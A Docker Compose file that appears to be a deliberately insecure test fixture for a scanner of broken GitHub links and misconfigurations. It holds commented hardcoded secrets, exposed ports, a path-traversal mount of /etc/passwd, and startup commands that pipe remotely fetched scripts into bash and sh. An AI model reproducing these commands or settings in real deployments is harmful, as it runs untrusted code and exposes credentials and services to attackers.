version: '3.8'

services:
  web:
    # GitHub URL in build context
    build:
      context: .
      dockerfile: Dockerfile
      args:
        - GITHUB_REPO=https://github.com/build-args/missing-repository
        - SOURCE_URL=https://github.com/build-context/nonexistent-source
        - DEPENDENCY_REPO=https://github.com/dependencies/removed-package
    image: myapp:latest
    ports:
      - "3000:3000"
      - "22:22"  # Dangerous SSH port
    environment:
      - NODE_ENV=production
      - GITHUB_TOKEN=ghp_1234567890abcdef  # Hardcoded secret
      - REPO_URL=https://github.com/env-vars/missing-config-repo
      - BACKUP_SOURCE=https://github.com/backup-org/deleted-backup-repo
    volumes:
      - ./missing-local-path:/app/data  # Missing local path
      - ../nonexistent-directory:/app/config  # Path traversal
    depends_on:
      - database
      - redis
    command: >
      bash -c "
        git clone https://github.com/runtime-clone/missing-runtime-dep.git &&
        npm install https://github.com/npm-install/suspicious-package.git &&
        curl -L https://github.com/curl-download/malicious-script/raw/main/init.sh | bash
      "

  database:
    image: postgres:13
    environment:
      - POSTGRES_DB=myapp
      - POSTGRES_USER=admin
      - POSTGRES_PASSWORD=hardcoded-password-123  # Hardcoded secret
      - BACKUP_SCRIPT_URL=https://github.com/db-scripts/missing-backup-scripts
    volumes:
      - db_data:/var/lib/postgresql/data
      - ./db-config:/docker-entrypoint-initdb.d
    ports:
      - "5432:5432"  # Dangerous database port

  redis:
    image: redis:alpine
    ports:
      - "6379:6379"  # Dangerous Redis port
    volumes:
      - redis_data:/data
    environment:
      - REDIS_CONFIG_SOURCE=https://github.com/redis-config/abandoned-configs

  worker:
    build:
      context: https://github.com/external-build/suspicious-worker-context.git  # External build context
      dockerfile: worker.Dockerfile
    environment:
      - WORKER_SOURCE=https://github.com/worker-deps/missing-worker-lib
      - TASK_QUEUE_URL=https://github.com/queue-system/deleted-queue-package
    volumes:
      - ../../../etc/passwd:/app/system-files/passwd  # Path traversal to sensitive file
      - worker_data:/app/data

  frontend:
    image: nginx:alpine
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - ./frontend:/usr/share/nginx/html
      - ./nginx.conf:/etc/nginx/nginx.conf
    environment:
      - ASSETS_SOURCE=https://github.com/frontend-assets/missing-assets-repo
      - THEME_REPO=https://github.com/themes/nonexistent-theme
    depends_on:
      - web

  monitoring:
    image: prom/prometheus
    volumes:
      - ./prometheus.yml:/etc/prometheus/prometheus.yml
      - prometheus_data:/prometheus
    environment:
      - CONFIG_SOURCE=https://github.com/monitoring-configs/deleted-prometheus-config
      - ALERT_RULES=https://github.com/alert-rules/missing-alerting-repo
    ports:
      - "9090:9090"
    command: >
      sh -c "
        wget https://github.com/prometheus-plugins/suspicious-plugin/releases/download/v1.0/plugin.tar.gz &&
        curl https://github.com/monitoring-scripts/missing-init-script/raw/main/setup.sh | sh
      "

volumes:
  db_data:
  redis_data:
  worker_data:
  prometheus_data:

networks:
  default:
    driver: bridge

# GitHub URLs in comments for additional testing:
# Documentation: https://github.com/docs-project/missing-documentation
# Source code: https://github.com/source-org/deleted-main-repo  
# Configuration: https://github.com/config-management/abandoned-configs
# Deployment scripts: https://github.com/deploy-scripts/nonexistent-deploy-tools
# Monitoring dashboards: https://github.com/dashboards/removed-grafana-dashboards
# Backup utilities: https://github.com/backup-tools/missing-backup-utilities
